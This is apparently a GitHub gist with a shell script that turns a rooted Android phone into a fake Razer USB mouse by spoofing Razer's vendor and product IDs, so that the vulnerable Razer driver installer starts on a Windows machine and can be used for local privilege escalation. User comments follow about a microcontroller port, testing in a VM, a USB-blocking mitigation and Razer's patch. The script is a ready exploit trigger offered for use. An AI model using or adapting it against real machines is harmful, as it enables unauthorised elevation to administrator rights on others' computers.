Razer USB gadget on Android for Local Privilege Escalation on Windows

usbgadget_razer.sh

# MINIMAL USB gadget setup using CONFIGFS for simulating Razer Gaming HID
# devices for triggering the vulnerable Windows Driver installer
# credits for the Windows Driver install vuln: @j0nh4t
#
# https://twitter.com/j0nh4t/status/1429049506021138437
# https://twitter.com/an0n_r0/status/1429263450748895236
#

# the script was developed & tested on Android LineageOS 18.1

# work as root
su

# enable CONFIGFS
mount -t configfs none /sys/kernel/config

# create gadget
mkdir /sys/kernel/config/usb_gadget/pwn_razer
cd /sys/kernel/config/usb_gadget/pwn_razer

# set vendor (Razer) & product id
# for a list of suitable devices see the inf files in driver cab archive
# (feel free to change the product id)
echo 0x1532 > idVendor
echo 0x023e > idProduct

# set USB version 2
echo 0x0200 > bcdUSB

# set device to class to Misc / Interface Association Descriptor.
echo 0xEF > bDeviceClass
echo 0x02 > bDeviceSubClass
echo 0x01 > bDeviceProtocol

# set some info strings
mkdir -p strings/0x409
echo "deadbeefdeadbeef" > strings/0x409/serialnumber
echo "an0n" > strings/0x409/manufacturer
echo "fake Razer device" > strings/0x409/product
mkdir -p configs/c.1/strings/0x409
echo "basic Multi-function device with single TLC (MI_02)" > configs/c.1/strings/0x409/configuration

# set some fake power config values
echo 250 > configs/c.1/MaxPower
echo 0x80 > configs/c.1/bmAttributes

# add 3 mouse HID devices (protocol 2) with a basic HID report descriptor
for i in g1 g2 g3 ; do
  mkdir -p functions/hid.${i}
  echo 2 > functions/hid.${i}/protocol
  echo 6 > functions/hid.${i}/report_length
  echo BQEJAqEBCQGhAIUBBQkZASkDFQAlAZUDdQGBApUBdQWBAwUBCTAJMRWBJX91CJUCgQaVAnUIgQHAwAUBCQKhAQkBoQCFAgUJGQEpAxUAJQGVA3UBgQKVAXUFgQEFAQkwCTEVACb/f5UCdRCBAsDA | base64 -d > functions/hid.${i}/report_desc
done

# activate the HID devices
for i in g1 g2 g3 ; do
  ln -s functions/hid.${i} configs/c.1/
done

# bind (for activating, disable default gadget and enable the new one)
# might need to be changed (if the active gadget is not in ../g1)
echo "" > ../g1/UDC ; getprop sys.usb.controller > UDC

Got my microcontroller working to trigger + automate this

pwn.mp4

Any way I can test this out on a vm without it auto executing on my pc?

Should be able to use a USB filter in the VMs usb settings to get the raw-ish device on the VM.
You could look into some of the mitigations people have come up with for your host e.g. https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc731387(v=ws.10)?redirectedfrom=MSDN#step-1-create-a-list-of-prohibited-devices forUSB\VID_1532

Got my microcontroller working to trigger + automate this
pwn.mp4

awesome! :)

Any way I can test this out on a vm without it auto executing on my pc?

Should be able to use a USB filter in the VMs usb settings to get the raw-ish device on the VM.
You could look into some of the mitigations people have come up with for your host e.g. https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc731387(v=ws.10)?redirectedfrom=MSDN#step-1-create-a-list-of-prohibited-devices forUSB\VID_1532

Thank you!!

Got my microcontroller working to trigger + automate this
pwn.mp4

😮

Got my microcontroller working to trigger + automate this
pwn.mp4

Nice!!! Can you share the code?

Got my microcontroller working to trigger + automate this
pwn.mp4

Nice!!! Can you share the code?

Sorry about the delay.
https://github.com/synap5e/razor-eop-XIAO

lol it even works with just basic PID and VID pairing for P4wnP1.

fyi > Razer patched spawning a simple shell.

I know it's been a while, but is this still supposed to work? I know the vulnerability is patched by now, but I can't even make the co-installer run.